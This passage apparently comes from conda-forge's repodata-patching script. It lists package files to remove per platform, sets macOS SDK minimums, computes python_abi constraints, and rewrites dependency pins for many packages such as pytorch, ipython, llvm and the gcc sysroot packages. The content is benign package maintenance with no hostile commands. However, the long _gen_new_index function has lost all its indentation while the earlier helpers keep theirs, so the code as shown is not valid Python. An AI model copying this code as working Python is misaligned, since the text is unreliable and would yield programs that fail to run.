"compliance-checker-3.0.3-py27_0.tar.bz2",
"compliance-checker-3.0.3-py35_0.tar.bz2",
"compliance-checker-3.0.3-py36_0.tar.bz2",
"doconce-1.0.0-py27_0.tar.bz2",
"doconce-1.0.0-py27_1.tar.bz2",
"doconce-1.0.0-py27_2.tar.bz2",
"doconce-1.0.0-py27_3.tar.bz2",
"doconce-1.0.0-py27_4.tar.bz2",
"doconce-1.4.0-py27_0.tar.bz2",
"doconce-1.4.0-py27_1.tar.bz2",
"ecmwf_grib-1.14.7-np110py27_0.tar.bz2",
"ecmwf_grib-1.14.7-np110py27_1.tar.bz2",
"ecmwf_grib-1.14.7-np111py27_0.tar.bz2",
"ecmwf_grib-1.14.7-np111py27_1.tar.bz2",
"flask-rest-orm-0.5.0-py35_0.tar.bz2",
"flask-rest-orm-0.5.0-py36_0.tar.bz2",
"itk-4.12.0-py27_0.tar.bz2",
"itk-4.12.0-py35_0.tar.bz2",
"itk-4.12.0-py36_0.tar.bz2",
"itk-4.13.0-py27_0.tar.bz2",
"itk-4.13.0-py35_0.tar.bz2",
"itk-4.13.0-py36_0.tar.bz2",
"lammps-2018.03.16-.tar.bz2",
"libtasn1-4.13-py36_0.tar.bz2",
"mpb-1.6.2-1.tar.bz2",
"nipype-0.12.0-0.tar.bz2",
"nipype-0.12.0-py35_0.tar.bz2",
"pygpu-0.6.5-0.tar.bz2",
"pytest-regressions-1.0.1-0.tar.bz2",
"reentry-1.1.0-py27_0.tar.bz2",
"resampy-0.2.0-py27_0.tar.bz2",
"statuspage-0.3.3-0.tar.bz2",
"statuspage-0.4.0-0.tar.bz2",
"statuspage-0.4.1-0.tar.bz2",
"statuspage-0.5.0-0.tar.bz2",
"statuspage-0.5.1-0.tar.bz2",
"sundials-3.1.0-blas_openblash0edd121_202.tar.bz2",
"vlfeat-0.9.20-h470a237_2.tar.bz2",
"xtensor-python-0.19.1-h3e44d54_0.tar.bz2",
),
"osx-arm64": (
),
"win-32": (
"compliance-checker-2.2.0-0.tar.bz2",
"compliance-checker-3.0.3-py27_0.tar.bz2",
"compliance-checker-3.0.3-py35_0.tar.bz2",
"compliance-checker-3.0.3-py36_0.tar.bz2",
"cookiecutter-1.4.0-0.tar.bz2",
"doconce-1.0.0-py27_0.tar.bz2",
"doconce-1.0.0-py27_1.tar.bz2",
"doconce-1.0.0-py27_2.tar.bz2",
"doconce-1.0.0-py27_3.tar.bz2",
"doconce-1.0.0-py27_4.tar.bz2",
"doconce-1.4.0-py27_0.tar.bz2",
"doconce-1.4.0-py27_1.tar.bz2",
"glpk-4.59-py27_vc9_0.tar.bz2",
"glpk-4.59-py34_vc10_0.tar.bz2",
"glpk-4.59-py35_vc14_0.tar.bz2",
"glpk-4.60-py27_vc9_0.tar.bz2",
"glpk-4.60-py34_vc10_0.tar.bz2",
"glpk-4.60-py35_vc14_0.tar.bz2",
"glpk-4.61-py27_vc9_0.tar.bz2",
"glpk-4.61-py35_vc14_0.tar.bz2",
"glpk-4.61-py36_0.tar.bz2",
"libspatialindex-1.8.5-py27_0.tar.bz2",
"liknorm-1.3.7-py27_1.tar.bz2",
"liknorm-1.3.7-py35_1.tar.bz2",
"liknorm-1.3.7-py36_1.tar.bz2",
"nlopt-2.4.2-0.tar.bz2",
"pygpu-0.6.5-0.tar.bz2",
),
"win-64": (
"compliance-checker-2.2.0-0.tar.bz2",
"compliance-checker-3.0.3-py27_0.tar.bz2",
"compliance-checker-3.0.3-py35_0.tar.bz2",
"compliance-checker-3.0.3-py36_0.tar.bz2",
"cookiecutter-1.4.0-0.tar.bz2",
"doconce-1.0.0-py27_0.tar.bz2",
"doconce-1.0.0-py27_1.tar.bz2",
"doconce-1.0.0-py27_2.tar.bz2",
"doconce-1.0.0-py27_3.tar.bz2",
"doconce-1.0.0-py27_4.tar.bz2",
"doconce-1.4.0-py27_0.tar.bz2",
"doconce-1.4.0-py27_1.tar.bz2",
"glpk-4.59-py27_vc9_0.tar.bz2",
"glpk-4.59-py34_vc10_0.tar.bz2",
"glpk-4.59-py35_vc14_0.tar.bz2",
"glpk-4.60-py27_vc9_0.tar.bz2",
"glpk-4.60-py34_vc10_0.tar.bz2",
"glpk-4.60-py35_vc14_0.tar.bz2",
"glpk-4.61-py27_vc9_0.tar.bz2",
"glpk-4.61-py35_vc14_0.tar.bz2",
"glpk-4.61-py36_0.tar.bz2",
"itk-4.13.0-py35_0.tar.bz2",
"libspatialindex-1.8.5-py27_0.tar.bz2",
"liknorm-1.3.7-py27_1.tar.bz2",
"liknorm-1.3.7-py35_1.tar.bz2",
"liknorm-1.3.7-py36_1.tar.bz2",
"nlopt-2.4.2-0.tar.bz2",
"pygpu-0.6.5-0.tar.bz2",
"pytest-regressions-1.0.1-0.tar.bz2",
),
}
OPERATORS = ["==", ">=", "<=", ">", "<", "!="]
OSX_SDK_FIXES = {
'nodejs-12.8.0-hec2bf70_1': '10.10',
'nodejs-12.1.0-h6de7cb9_1': '10.10',
'nodejs-12.3.1-h6de7cb9_0': '10.10',
'nodejs-12.9.0-hec2bf70_0': '10.10',
'nodejs-12.9.1-hec2bf70_0': '10.10',
'nodejs-12.7.0-hec2bf70_1': '10.10',
'nodejs-12.10.0-hec2bf70_0': '10.10',
'nodejs-12.4.0-h6de7cb9_0': '10.10',
'nodejs-12.11.1-hec2bf70_0': '10.10',
'nodejs-12.7.0-h6de7cb9_0': '10.10',
'nodejs-12.3.0-h6de7cb9_0': '10.10',
'nodejs-10.16.3-hec2bf70_0': '10.10',
'nodejs-12.12.0-hfddbe92_0': '10.10',
'nodejs-12.8.1-hec2bf70_0': '10.10',
'javafx-sdk-11.0.4-h6dcaf97_1': '10.11',
'javafx-sdk-12.0.2-h6dcaf97_1': '10.11',
'javafx-sdk-12.0.2-h6dcaf97_0': '10.11',
'javafx-sdk-11.0.4-h6dcaf97_0': '10.11',
'qt-5.12.1-h1b46049_0': '10.12',
'qt-5.9.7-h8cf7e54_3': '10.12',
'qt-5.9.7-h93ee506_0': '10.12',
'qt-5.9.7-h93ee506_1': '10.12',
'qt-5.12.5-h1b46049_0': '10.12',
'qt-5.9.7-h93ee506_2': '10.12',
'openmpi-mpicxx-4.0.1-h6052eea_2': '10.12',
'openmpi-mpicxx-4.0.1-h6052eea_1': '10.12',
'openmpi-mpicxx-4.0.1-h6052eea_0': '10.12',
'openmpi-mpicxx-4.0.1-hc9558a2_2': '10.12',
'openmpi-mpicxx-4.0.1-hc9558a2_0': '10.12',
'openmpi-mpicxx-4.0.1-hc9558a2_1': '10.12',
'freecad-0.18.3-py37h4764a83_2': '10.12',
'freecad-0.18.3-py37hc453731_1': '10.12',
'freecad-0.18.4-py37hab2b3aa_1': '10.12',
'freecad-0.18.4-py37hab2b3aa_0': '10.12',
'openmpi-mpicc-4.0.1-h24e1f75_1': '10.12',
'openmpi-mpicc-4.0.1-h24e1f75_2': '10.12',
'openmpi-mpicc-4.0.1-h24e1f75_0': '10.12',
'openmpi-mpicc-4.0.1-h516909a_0': '10.12',
'openmpi-mpicc-4.0.1-h516909a_1': '10.12',
'openmpi-mpicc-4.0.1-h516909a_2': '10.12',
'openmpi-mpifort-4.0.1-h939af09_0': '10.12',
'openmpi-mpifort-4.0.1-h6ad152f_2': '10.12',
'openmpi-mpifort-4.0.1-h939af09_2': '10.12',
'openmpi-mpifort-4.0.1-h939af09_1': '10.12',
'openmpi-mpifort-4.0.1-he991be0_0': '10.12',
'openmpi-mpifort-4.0.1-he991be0_1': '10.12',
'openmpi-mpifort-4.0.1-he991be0_2': '10.12',
'reaktoro-1.0.7-py37h99eb986_0': '10.12',
'reaktoro-1.0.7-py37h99eb986_1': '10.12',
'reaktoro-1.0.7-py36h99eb986_0': '10.12',
'reaktoro-1.0.7-py36h99eb986_1': '10.12',
'pyqt-5.12.3-py38he22c54c_1': '10.12',
'pyqt-5.9.2-py37h2a560b1_0': '10.12',
'pyqt-5.12.3-py36he22c54c_1': '10.12',
'pyqt-5.9.2-py27h2a560b1_4': '10.12',
'pyqt-5.9.2-py27h2a560b1_1': '10.12',
'pyqt-5.9.2-py37h2a560b1_4': '10.12',
'pyqt-5.9.2-py36h2a560b1_3': '10.12',
'pyqt-5.9.2-py27h2a560b1_2': '10.12',
'pyqt-5.9.2-py36h2a560b1_1': '10.12',
'pyqt-5.12.3-py27h2a560b1_0': '10.12',
'pyqt-5.12.3-py37h2a560b1_0': '10.12',
'pyqt-5.12.3-py27he22c54c_0': '10.12',
'pyqt-5.12.3-py27he22c54c_1': '10.12',
'pyqt-5.9.2-py37h2a560b1_2': '10.12',
'pyqt-5.9.2-py37h2a560b1_1': '10.12',
'pyqt-5.9.2-py36h2a560b1_0': '10.12',
'pyqt-5.9.2-py36h2a560b1_4': '10.12',
'pyqt-5.9.2-py27h2a560b1_0': '10.12',
'pyqt-5.9.2-py37h2a560b1_3': '10.12',
'pyqt-5.12.3-py38he22c54c_0': '10.12',
'pyqt-5.9.2-py27h2a560b1_3': '10.12',
'pyqt-5.9.2-py36h2a560b1_2': '10.12',
'pyqt-5.12.3-py37he22c54c_0': '10.12',
'pyqt-5.12.3-py36he22c54c_0': '10.12',
'pyqt-5.12.3-py37he22c54c_1': '10.12',
'pyqt-5.12.3-py36h2a560b1_0': '10.12',
'ldas-tools-al-2.6.3-hf543496_0': '10.12',
'ldas-tools-al-2.6.3-hf543496_1': '10.12',
'ldas-tools-al-2.6.4-h4f290e7_1': '10.12',
'ldas-tools-al-2.6.4-h4f290e7_0': '10.12',
'openmpi-4.0.1-ha90c164_2': '10.12',
'openmpi-4.0.1-ha90c164_0': '10.12',
'openmpi-4.0.1-hfcebdee_2': '10.12',
'openmpi-4.0.1-ha90c164_1': '10.12',
'openmpi-4.0.1-hc99cbb1_1': '10.12',
'openmpi-4.0.1-hc99cbb1_0': '10.12',
'openmpi-4.0.1-hc99cbb1_2': '10.12',
}
def _add_removals(instructions, subdir):
    """Extend ``instructions['remove']`` for *subdir*.

    Combines the hard-coded REMOVALS table with every package currently on
    the channel's 'broken' label, de-duplicated.

    Raises:
        requests.HTTPError: if the broken-label repodata cannot be fetched.
    """
    r = requests.get(
        "https://conda.anaconda.org/conda-forge/"
        "label/broken/%s/repodata.json" % subdir
    )
    if r.status_code != 200:
        r.raise_for_status()
    data = r.json()
    currvals = list(REMOVALS.get(subdir, []))
    for pkg_name in data["packages"]:
        currvals.append(pkg_name)
    # Sort for deterministic patch output — iterating a bare set yields an
    # arbitrary, hash-seed-dependent order.
    instructions["remove"].extend(sorted(set(currvals)))
def _gen_patch_instructions(index, new_index, subdir):
    """Diff the original and adjusted indices into a patch-instructions dict.

    Any value that changed, and any key that only exists in the new index,
    becomes an entry under 'packages'; removals are filled in separately.
    """
    instructions = {
        "patch_instructions_version": 1,
        "packages": defaultdict(dict),
        "revoke": [],
        "remove": [],
    }
    _add_removals(instructions, subdir)
    # Diff every record: changed values and brand-new keys both become patches.
    for fn, old_record in index.items():
        assert fn in new_index
        new_record = new_index[fn]
        for key, old_value in old_record.items():
            assert key in new_record, (key, old_record, new_record)
            if old_value != new_record[key]:
                instructions['packages'][fn][key] = new_record[key]
        for key, new_value in new_record.items():
            if key not in old_record:
                instructions['packages'][fn][key] = new_value
    return instructions
def has_dep(record, name):
    """Return True if *name* appears as a package name in record's depends."""
    for dep in record.get('depends', ()):
        if dep.split(' ')[0] == name:
            return True
    return False
def get_python_abi(version, subdir, build=None):
    """Return the python_abi build tag (e.g. 'cp36m') for a python version.

    If *build* contains a pyXY marker (e.g. 'py38h1234_0'), that version wins
    over the *version* argument. Returns None when no known ABI applies.
    """
    if build is not None:
        # Raw string: '\d' in a plain literal is an invalid escape sequence
        # (DeprecationWarning today, a SyntaxError in future Pythons).
        # The greedy '.*' keeps the original behavior of using the last pyXY.
        m = re.match(r".*py(\d)(\d)", build)
        if m:
            version = f"{m.group(1)}.{m.group(2)}"
    if version.startswith("2.7"):
        if subdir.startswith("linux"):
            return "cp27mu"  # linux py2 builds used the wide-unicode ABI
        return "cp27m"
    elif version.startswith("2.6"):
        if subdir.startswith("linux"):
            return "cp26mu"
        return "cp26m"
    elif version.startswith("3.4"):
        return "cp34m"
    elif version.startswith("3.5"):
        return "cp35m"
    elif version.startswith("3.6"):
        return "cp36m"
    elif version.startswith("3.7"):
        return "cp37m"
    elif version.startswith("3.8"):
        return "cp38"
    elif version.startswith("3.9"):
        return "cp39"
    return None
# Workaround for https://github.com/conda/conda-build/pull/3868
def remove_python_abi(record):
    """Strip any 'python_abi' entry from record['depends'], in place.

    The python, python_abi and pypy packages themselves are left untouched.
    """
    if record['name'] in ('python', 'python_abi', 'pypy'):
        return
    if not has_dep(record, 'python_abi'):
        return
    kept = [dep for dep in record.get('depends', []) if dep.split(" ")[0] != "python_abi"]
    record['depends'] = kept
changes = set([])
def add_python_abi(record, subdir):
    """Add a python_abi constraint to python and python-dependent records.

    Mutates *record* in place and logs each rewrite into the module-level
    ``changes`` set. Records that depend on pypy or already carry a
    python_abi dependency are left alone.
    """
    record_name = record['name']
    # Make existing python and python-dependent packages conflict with pypy
    if record_name == "python" and not record['build'].endswith("pypy"):
        version = record['version']
        new_constrains = record.get('constrains', [])
        python_abi = get_python_abi(version, subdir)
        new_constrains.append(f"python_abi * *_{python_abi}")
        record['constrains'] = new_constrains
        return
    if has_dep(record, 'python') and not has_dep(record, 'pypy') and not has_dep(record, 'python_abi'):
        python_abi = None
        new_constrains = record.get('constrains', [])
        build = record["build"]
        ver_strict_found = False
        ver_relax_found = False
        for dep in record.get('depends', []):
            dep_split = dep.split(' ')
            if dep_split[0] == 'python':
                # 'python x.y.z build' exact pins and bare 'python' are skipped
                if len(dep_split) == 3:
                    continue
                if len(dep_split) == 1:
                    continue
                elif dep_split[1] == "<3":
                    python_abi = get_python_abi("2.7", subdir, build)
                elif dep_split[1].startswith(">="):
                    m = cb_pin_regex.match(dep_split[1])
                    # 'is None', not '== None': identity check for the regex miss
                    if m is None:
                        python_abi = get_python_abi("", subdir, build)
                    else:
                        lower = pad_list(m.group("lower").split("."), 2)[:2]
                        upper = pad_list(m.group("upper").split("."), 2)[:2]
                        # '>=x.y,<x.(y+1)' pins exactly one minor version
                        if lower[0] == upper[0] and int(lower[1]) + 1 == int(upper[1]):
                            python_abi = get_python_abi(m.group("lower"), subdir, build)
                        else:
                            python_abi = get_python_abi("", subdir, build)
                else:
                    python_abi = get_python_abi(dep_split[1], subdir, build)
                if python_abi:
                    new_constrains.append(f"python_abi * *_{python_abi}")
                    changes.add((dep, f"python_abi * *_{python_abi}"))
                    ver_strict_found = True
                else:
                    ver_relax_found = True
        if not ver_strict_found and ver_relax_found:
            # No version-specific ABI could be inferred: just block pypy
            new_constrains.append("pypy <0a0")
        # Assign inside the guarded branch: at function level, new_constrains
        # is unbound (NameError) for records with no python dependency.
        record['constrains'] = new_constrains
def _gen_new_index(repodata, subdir):
"""Make any changes to the index by adjusting the values directly.
This function returns the new index with the adjustments.
Finally, the new and old indices are then diff'ed to produce the repo
data patches.
"""
index = copy.deepcopy(repodata["packages"])
# deal with windows vc features
if subdir.startswith("win-"):
python_vc_deps = {
'2.6': 'vc 9.*',
'2.7': 'vc 9.*',
'3.3': 'vc 10.*',
'3.4': 'vc 10.*',
'3.5': 'vc 14.*',
'3.6': 'vc 14.*',
'3.7': 'vc 14.*',
}
for fn, record in index.items():
record_name = record['name']
if record_name == 'python':
# remove the track_features key
if 'track_features' in record:
record['track_features'] = None
# add a vc dependency
if not any(d.startswith('vc') for d in record['depends']):
depends = record['depends']
depends.append(python_vc_deps[record['version'][:3]])
record['depends'] = depends
elif 'vc' in record.get('features', ''):
# remove vc from the features key
vc_version = _extract_and_remove_vc_feature(record)
if vc_version:
# add a vc dependency
if not any(d.startswith('vc') for d in record['depends']):
depends = record['depends']
depends.append('vc %d.*' % vc_version)
record['depends'] = depends
proj4_fixes = {"cartopy", "cdo", "gdal", "libspatialite", "pynio", "qgis"}
for fn, record in index.items():
record_name = record["name"]
if record.get('timestamp', 0) < 1604417730000:
if subdir == 'noarch':
remove_python_abi(record)
else:
add_python_abi(record, subdir)
if "license" in record and "license_family" not in record and record["license"]:
family = get_license_family(record["license"])
if family:
record['license_family'] = family
# remove dependency from constrains for twisted
if record_name == "twisted":
new_constrains = [dep for dep in record.get('constrains', ())
if not dep.startswith("pyobjc-framework-cococa")]
if new_constrains != record.get('constrains', ()):
record['constrains'] = new_constrains
if record_name == "starlette-base":
if not any(dep.split(' ')[0] == "starlette" for dep in record.get('constrains', ())):
if 'constrains' in record:
record['constrains'].append(f"starlette {record["version"]}")
else:
record['constrains'] = [f"starlette {record["version"]}"]
if record_name == "pytorch" and record.get('timestamp', 0) < 1610297816658:
# https://github.com/conda-forge/pytorch-cpu-feedstock/issues/29
if not any(dep.split(' ')[0] == 'typing_extensions'
for dep in record.get('depends', ())):
if 'depends' in record:
record['depends'].append("typing_extensions")
else:
record['depends'] = ["typing_extensions"]
if record_name == "ipython" and record.get('timestamp', 0) < 1609621539000:
# https://github.com/conda-forge/ipython-feedstock/issues/127
if any(dep.split(' ')[0] == "jedi" for dep in record.get('depends', ())):
record['depends'].append('jedi <0.18')
if record_name == "kartothek" and record.get('timestamp', 0) < 1611565264000:
# https://github.com/conda-forge/kartothek-feedstock/issues/36
if "zstandard" in record['depends']:
i = record['depends'].index('zstandard')
record['depends'][i] = 'zstandard <0.15'
if record_name == "gitdb" and record['version'].startswith('4.0.') and 'smmap >=3.0.1' in record['depends']:
i = record['depends'].index('smmap >=3.0.1')
record['depends'][i] = 'smmap >=3.0.1,<4'
if record_name == "arrow-cpp":
if not any(dep.split(' ')[0] == "arrow-cpp-proc" for dep in record.get('constrains', ())):
if 'constrains' in record:
record['constrains'].append("arrow-cpp-proc * cpu")
else:
record['constrains'] = ["arrow-cpp-proc * cpu"]
if "aws-sdk-cpp" in record['depends']:
i = record['depends'].index('aws-sdk-cpp')
record['depends'][i] = 'aws-sdk-cpp 1.7.164'
if record_name == "pyarrow":
if not any(dep.split(' ')[0] == "arrow-cpp-proc" for dep in record.get('constrains', ())):
if 'constrains' in record:
record['constrains'].append("arrow-cpp-proc * cpu")
else:
record['constrains'] = ["arrow-cpp-proc * cpu"]
if record_name == "kartothek":
if record["version"] in ["3.15.0", "3.15.1", "3.16.0"] \
and "pyarrow >=0.13.0,!=0.14.0,<2" in record["depends"]:
i = record["depends"].index("pyarrow >=0.13.0,!=0.14.0,<2")
record["depends"][i] = "pyarrow >=0.17.1,<2"
# distributed <2.11.0 does not work with msgpack-python >=1.0
# newer versions of distributed require at least msgpack-python >=0.6.0
# so we can fix cases where msgpack-python is unbounded
# https://github.com/conda-forge/distributed-feedstock/pull/114
if record_name == 'distributed':
if 'msgpack-python' in record['depends']:
i = record['depends'].index('msgpack-python')
record['depends'][i] = 'msgpack-python <1.0.0'
# python-language-server <=0.31.9 requires pyflakes <2.2.2
# included explicitly in 0.31.10+
# https://github.com/conda-forge/python-language-server-feedstock/pull/50
version = record['version']
if record_name == 'python-language-server':
pversion = pkg_resources.parse_version(version)
v0_31_9 = pkg_resources.parse_version('0.31.9')
if pversion <= v0_31_9 and 'pyflakes >=1.6.0' in record['depends']:
i = record['depends'].index('pyflakes >=1.6.0')
record['depends'][i] = 'pyflakes >=1.6.0,<2.2.0'
# aioftp >=0.17.0 requires python >=3.7
# aioftp 0.17.x was incorrectly built with 3.6 support
# https://github.com/conda-forge/aioftp-feedstock/pull/12
version = record['version']
if record_name == 'aioftp':
pversion = pkg_resources.parse_version(version)
base_version = pkg_resources.parse_version('0.17.0')
max_version = pkg_resources.parse_version('0.17.2')
if base_version <= pversion <= max_version and 'python >=3.6' in record['depends']:
i = record['depends'].index('python >=3.6')
record['depends'][i] = 'python >=3.7'
# numpydoc >=1.0.0 requires python >=3.5
# https://github.com/conda-forge/numpydoc-feedstock/pull/14
version = record['version']
if record_name == 'numpydoc':
pversion = pkg_resources.parse_version(version)
v1_0_0 = pkg_resources.parse_version('1.0.0')
v1_1_0 = pkg_resources.parse_version('1.1.0')
if v1_0_0 <= pversion <= v1_1_0 and 'python' in record['depends']:
i = record['depends'].index('python')
record['depends'][i] = 'python >=3.5'
# pip >=21 requires python >=3.6 but the first build has >=3
# https://github.com/conda-forge/pip-feedstock/pull/68
if record_name == 'pip':
if record['version'] == "21.0" and record['build'] == "pyhd8ed1ab_0":
i = record['depends'].index('python >=3')
record['depends'][i] = 'python >=3.6'
# fix deps with wrong names
if record_name in proj4_fixes:
_rename_dependency(fn, record, "proj.4", "proj4")
if record_name == "airflow-with-async":
_rename_dependency(fn, record, "evenlet", "eventlet")
if record_name == "iris":
_rename_dependency(fn, record, "nc_time_axis", "nc-time-axis")
if (record_name == "r-base" and
not any(dep.startswith("_r-mutex ")
for dep in record["depends"])):
depends = record["depends"]
depends.append("_r-mutex 1.* anacondar_1")
record["depends"] = depends
if record_name == "gcc_impl_{}".format(subdir):
_relax_exact(fn, record, "binutils_impl_{}".format(subdir))
deps = record.get("depends", ())
if "ntl" in deps and record_name != "sage":
_rename_dependency(fn, record, "ntl", "ntl 10.3.0")
if "libiconv >=1.15,<1.16.0a0" in deps:
_pin_looser(fn, record, "libiconv", upper_bound="1.17.0")
if 're2' in deps and record.get('timestamp', 0) < 1588349339243:
_rename_dependency(fn, record, "re2", "re2 <2020.05.01")
if 'libffi' in deps and record.get('timestamp', 0) < 1605980936031:
_rename_dependency(fn, record, "libffi", "libffi <3.3.0.a0")
if 'libffi >=3.2.1,<4.0a0' in deps and record.get('timestamp', 0) < 1605980936031:
_pin_stricter(fn, record, "libffi", "x.x")
_relax_libssh2_1_x_pinning(fn, record)
if any(dep.startswith("gf2x") for dep in deps):
_pin_stricter(fn, record, "gf2x", "x.x")
if any(dep.startswith("libnetcdf >=4.7.3") for dep in deps):
_pin_stricter(fn, record, "libnetcdf", "x.x.x.x")
if any(dep.startswith("libarchive >=3.3") for dep in deps):
_pin_looser(fn, record, "libarchive", upper_bound="3.6.0")
# fix only packages built before the run_exports was corrected.
if any(dep == "libflang" or dep.startswith("libflang >=5.0.0") for dep in deps) and record.get('timestamp', 0) < 1611789153000:
record["depends"].append("libflang <6.0.0.a0")
if any(dep.startswith("libignition-") or dep == 'libsdformat' for dep in deps):
for dep_idx, _ in enumerate(deps):
dep = record['depends'][dep_idx]
if dep.startswith('libignition-'):
_pin_looser(fn, record, dep.split(" ")[0], max_pin="x")
if dep.startswith('libsdformat '):
_pin_looser(fn, record, dep.split(" ")[0], max_pin="x")
# this doesn't seem to match the _pin_looser or _pin_stricter patterns
# nor _replace_pin
if record_name == "jedi" and record.get("timestamp", 0) < 1592619891258:
for i, dep in enumerate(record["depends"]):
if dep.startswith("parso") and "<" not in dep:
_dep_parts = dep.split(" ")
_dep_parts[1] = _dep_parts[1] + ",<0.8.0"
record["depends"][i] = " ".join(_dep_parts)
# FIXME: disable patching-out blas_openblas feature
# because hotfixes are not applied to gcc7 label
# causing inconsistent behavior
# if (record_name == "blas" and
# record["track_features"] == "blas_openblas"):
# instructions["packages"][fn]["track_features"] = None
# if "features" in record:
# if "blas_openblas" in record["features"]:
# # remove blas_openblas feature
# instructions["packages"][fn]["features"] = _extract_feature(
# record, "blas_openblas")
# if not any(d.startswith("blas ") for d in record["depends"]):
# depends = record['depends']
# depends.append("blas 1.* openblas")
# instructions["packages"][fn]["depends"] = depends
if any(dep.startswith("zstd >=1.4") for dep in deps):
_pin_looser(fn, record, "zstd", max_pin="x.x")
# We pin MPI packages loosely so as to rely on their ABI compatibility
if any(dep.startswith("openmpi >=4.0") for dep in deps):
_pin_looser(fn, record, "openmpi", upper_bound="5.0")
if any(dep.startswith("mpich >=3.3") for dep in deps):
_pin_looser(fn, record, "mpich", upper_bound="4.0")
_replace_pin('libunwind >=1.2.1,<1.3.0a0', 'libunwind >=1.2.1,<2.0.0a0', deps, record)
_replace_pin('snappy >=1.1.7,<1.1.8.0a0', 'snappy >=1.1.7,<2.0.0.0a0', deps, record)
_replace_pin('ncurses >=6.1,<6.2.0a0', 'ncurses >=6.1,<6.3.0a0', deps, record)
_replace_pin('abseil-cpp', 'abseil-cpp =20190808', deps, record)
if record_name not in ["blas", "libblas", "libcblas", "liblapack",
"liblapacke", "lapack", "blas-devel"]:
_replace_pin('liblapack >=3.8.0,<3.9.0a0', 'liblapack >=3.8.0,<4.0.0a0', deps, record)
_replace_pin('liblapacke >=3.8.0,<3.9.0a0', 'liblapacke >=3.8.0,<4.0.0a0', deps, record)
# Filter by timestamp as pythia8 also contains python bindings that shouldn't be pinned
if 'pythia8' in deps and record.get('timestamp', 0) < 1584264455759:
i = record['depends'].index('pythia8')
record['depends'][i] = 'pythia8 >=8.240,<8.300.0a0'
# remove features for openjdk and rb2
if ("track_features" in record and
record['track_features'] is not None):
for feat in record["track_features"].split():
if feat.startswith(("rb2", "openjdk")):
record["track_features"] = _extract_track_feature(
record, feat)
llvm_pkgs = ["libclang", "clang", "clang-tools", "llvm", "llvm-tools", "llvmdev"]
for llvm in ["libllvm8", "libllvm9"]:
if any(dep.startswith(llvm) for dep in deps):
if record_name not in llvm_pkgs:
_relax_exact(fn, record, llvm, max_pin="x.x")
else:
_relax_exact(fn, record, llvm, max_pin="x.x.x")
if record_name in llvm_pkgs:
new_constrains = record.get('constrains', [])
version = record["version"]
for pkg in llvm_pkgs:
if record_name == pkg:
continue
if pkg in new_constrains:
del new_constrains[pkg]
if any(constraint.startswith(f"{pkg} ") for constraint in new_constrains):
continue
new_constrains.append(f'{pkg} {version}.*')
record['constrains'] = new_constrains
# make sure the libgfortran version is bound from 3 to 4 for osx
if subdir == "osx-64":
_fix_libgfortran(fn, record)
_fix_libcxx(fn, record)
full_pkg_name = fn.replace('.tar.bz2', '')
if full_pkg_name in OSX_SDK_FIXES:
_set_osx_virt_min(fn, record, OSX_SDK_FIXES[full_pkg_name])
# make old binutils packages conflict with the new sysroot packages
# that have renamed the sysroot from conda_cos6 or conda_cos7 to just
# conda
if (
subdir in ["linux-64", "linux-aarch64", "linux-ppc64le"]
and record_name in [
"binutils", "binutils_impl_" + subdir, "ld_impl_" + subdir]
and record.get('timestamp', 0) < 1589953178153 # 2020-05-20
):
new_constrains = record.get('constrains', [])
new_constrains.append("sysroot_" + subdir + " ==99999999999")
record["constrains"] = new_constrains
# make sure the old compilers conflict with the new sysroot packages
# and they only use libraries from the old compilers
if (
subdir in ["linux-64", "linux-aarch64", "linux-ppc64le"]
and record_name in [
"gcc_impl_" + subdir, "gxx_impl_" + subdir, "gfortran_impl_" + subdir]
and record['version'] in ['5.4.0', '7.2.0', '7.3.0', '8.2.0']
):
new_constrains = record.get('constrains', [])
for pkg in ["libgcc-ng", "libstdcxx-ng", "libgfortran", "libgomp"]:
new_constrains.append("{} 5.4.*|7.2.*|7.3.*|8.2.*|9.1.*|9.2.*".format(pkg))
new_constrains.append("binutils_impl_" + subdir + " <2.34")
new_constrains.append("ld_impl_" + subdir + " <2.34")
new_constrains.append("sysroot_" + subdir + " ==99999999999")
record["constrains"] = new_constrains
# we pushed a few builds of the compilers past the list of versions
# above which do not use the sysroot packages - this block catches those
# it will also break some test builds of the new compilers but we should
# not be using those anyways and they are marked as broken.
if (
subdir in ["linux-64", "linux-aarch64", "linux-ppc64le"]
and record_name in [
"gcc_impl_" + subdir, "gxx_impl_" + subdir, "gfortran_impl_" + subdir]
and record['version'] not in ['5.4.0', '7.2.0', '7.3.0', '8.2.0']
and not any(__r.startswith("sysroot_") for __r in record.get("depends", []))
):
new_constrains = record.get('constrains', [])
new_constrains.append("sysroot_" + subdir + " ==99999999999")
record["constrains"] = new_constrains
# all ctng activation packages that don't depend on the sysroot_*
# packages are not compatible with the new sysroot_*-based compilers
# root and cling must also be included as they have a builtin C++ interpreter
if (
subdir in ["linux-64", "linux-aarch64", "linux-ppc64le"]
and record_name in [
"gcc_" + subdir, "gxx_" + subdir, "gfortran_" + subdir,
"binutils_" + subdir, "gcc_bootstrap_" + subdir, "root_base", "cling"]
and not any(__r.startswith("sysroot_") for __r in record.get("depends", []))
):
new_constrains = record.get('constrains', [])
new_constrains.append("sysroot_" + subdir + " ==99999999999")
record["constrains"] = new_constrains
# old CDTs with the conda_cos6 or conda_cos7 name in the sysroot need to
# conflict with the new CDT and compiler packages
# all of the new CDTs and compilers depend on the sysroot_{subdir} packages
# so we use a constraint on those
if (
subdir == "noarch"
and (
record_name.endswith("-cos6-x86_64") or
record_name.endswith("-cos7-x86_64") or
record_name.endswith("-cos7-aarch64") or
record_name.endswith("-cos7-ppc64le")
)
and not record_name.startswith("sysroot-")
and not any(__r.startswith("sysroot_") for __r in record.get("depends", []))
):
if record_name.endswith("x86_64"):
sys_subdir = "linux-64"
elif record_name.endswith("aarch64"):
sys_subdir = "linux-aarch64"
elif record_name.endswith("ppc64le"):
sys_subdir = "linux-ppc64le"
new_constrains = record.get('constrains', [])
if not any(__r.startswith("sysroot_") for __r in new_constrains):
new_constrains.append("sysroot_" + sys_subdir + " ==99999999999")
record["constrains"] = new_constrains
# make sure pybind11 and pybind11-global have run constraints on
# the abi metapackage
# see https://github.com/conda-forge/conda-forge-repodata-patches-feedstock/issues/104 # noqa
if (
record_name in ["pybind11", "pybind11-global"]
# this version has a constraint sometimes
and (
pkg_resources.parse_version(record["version"])
<= pkg_resources.parse_version("2.6.1")
)
and not any(
c.startswith("pybind11-abi ")
for c in record.get("constrains", [])
)
):
_add_pybind11_abi_constraint(fn, record)
# add *lal>=7.1.1 as run_constrained for liblal-7.1.1
if (
record_name == "liblal"
and record['version'] == "7.1.1"
and record['build_number'] in (0, 1, 2, 100, 101, 102)
):
record.setdefault('constrains', []).extend((
"lal >=7.1.1",
"python-lal >=7.1.1",
))
return index
